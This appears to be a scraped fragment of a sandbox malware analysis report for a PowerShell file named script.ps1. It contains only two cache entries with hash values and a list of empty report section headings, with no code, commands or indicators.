Chrome Cache Entry: 96	ASCII text	6FED308183D5DFC421602548615204AF	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
Chrome Cache Entry: 97	ASCII text, with very long lines (65531)	FB8532F93008BDE8905110D3D830A6E3	3263052FB8D64D953241FBEAE68D52D05928958C	924BA453EA3FB4EEC06516EDA1448E8B4BB3B5F446FD4C45CA344AADB6F6FD14

Windows Analysis Report script.ps1

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
script.ps1

Malware Threat Intel
Provided by